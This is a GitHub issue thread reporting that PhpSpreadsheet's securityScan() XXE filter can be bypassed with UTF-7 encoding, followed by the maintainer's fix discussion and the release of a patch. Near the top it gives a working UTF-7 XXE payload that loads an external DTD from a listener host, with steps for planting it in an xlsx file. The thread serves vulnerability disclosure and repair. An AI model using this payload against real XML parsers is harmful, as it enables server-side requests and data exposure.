This is:
- [X] a bug report
- [ ] a feature request
- [ ] **not** a usage question (ask them on https://stackoverflow.com/questions/tagged/phpspreadsheet or https://gitter.im/PHPOffice/PhpSpreadsheet)
The securityScan() function is used to prevent XXE attacks.
The securityScan() function can be bypassed by using UTF-7 encoding.
/Details suppressed until after patch was released/
Replace the IP address and port 127.0.0.1:8080 with something you control.
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE xmlrootname +AFsAPAAh-ENTITY +ACU aaa SYSTEM +ACI-http://127.0.0.1:8080/ext.
dtd+ACIAPgAl-aaa+ADsAJQ-ccc+ADsAJQ-ddd+ADsAXQA+
sheet1.xml
Replace sheet1.xml in your xlsx file with the one above and re-zip the excel sheet. I've attached an xlsx file that makes a request as configured above.
Set up a listener either with Python, netcat, etc. locally and watch for a request that will be made once the xlsx is read by the library.
Please let me know if you would like more details on generating the xlsx file or if you need any clarification about the issue.
I believe it affects all versions.
Thanks for highlighting this issue. I've been reading up on UTF-7, and understand how this works, and am looking to the most efficient solution that I can find for handling charsets like UTF-7
Hey @MarkBaker,
Would it be possible for the libxml_disable_entity_loader(true); [1] option to be set? Disabling entities would remove the risk entirely. Unless alternate encodings are disabled then there is the potential to bypass this again using another encoding type, such as UTF-16.
[1] http://php.net/manual/en/function.libxml-disable-entity-loader.php
libxml_disable_entity_loader() couldn't be used originally because it it wasn't an option with the PHP versions supported by the original PHPExcel library requirement for PHP >= 5.2.0 - libxml_disable_entity_loader() was introduced in 5.2.11 - and when we ported everything to PHPSpreadsheet we simply ported the securityScan() code as it already existed... so certainly it is an option now.
The other option that I'd consider is a charset conversion to UTF-8, which would also support xlsx files created using apps that don't use UTF-8 in the XML when creating xlsx files, but I have no idea whether such xlsx scripts actually exist.
Overall, the use of libxml_disable_entity_loader() is a better option in many ways; the only drawback being that it's a global setting and may have adverse effects elsewhere in an end users script if they are dealing with xml files outside of PhpSpreadsheet. Worth the risk of that, I'd probably agree.
Looking more closely libxml_disable_entity_loader() was non thread-safe - bug reference #64938 -, set globally until 2016-07-20, and still a problem with fpm until 2017-11-28. That equates to PHP versions 7.0.27 (for 7.0, EOL in 2 weeks), 7.1.13 and 7.2.1 across the three branches. That's the level of risk using it.
Initial work done on xxe branch
Fixed in version 1.5.1
Thank you for the fix! I was unable to find a bypass around the new checks.
Thanks for alerting us to the vulnerability; although I would have preferred an email with the details, rather than posting an actual example publicly here, and an email would have triggered my attention sooner.
My apologies. I was unable to find a contact email or website for the project, which is why I submitted the bug through here. I will keep that in mind if I come across any issues in the future.
:'(

Most helpful comment
Thank you for the fix! I was unable to find a bypass around the new checks.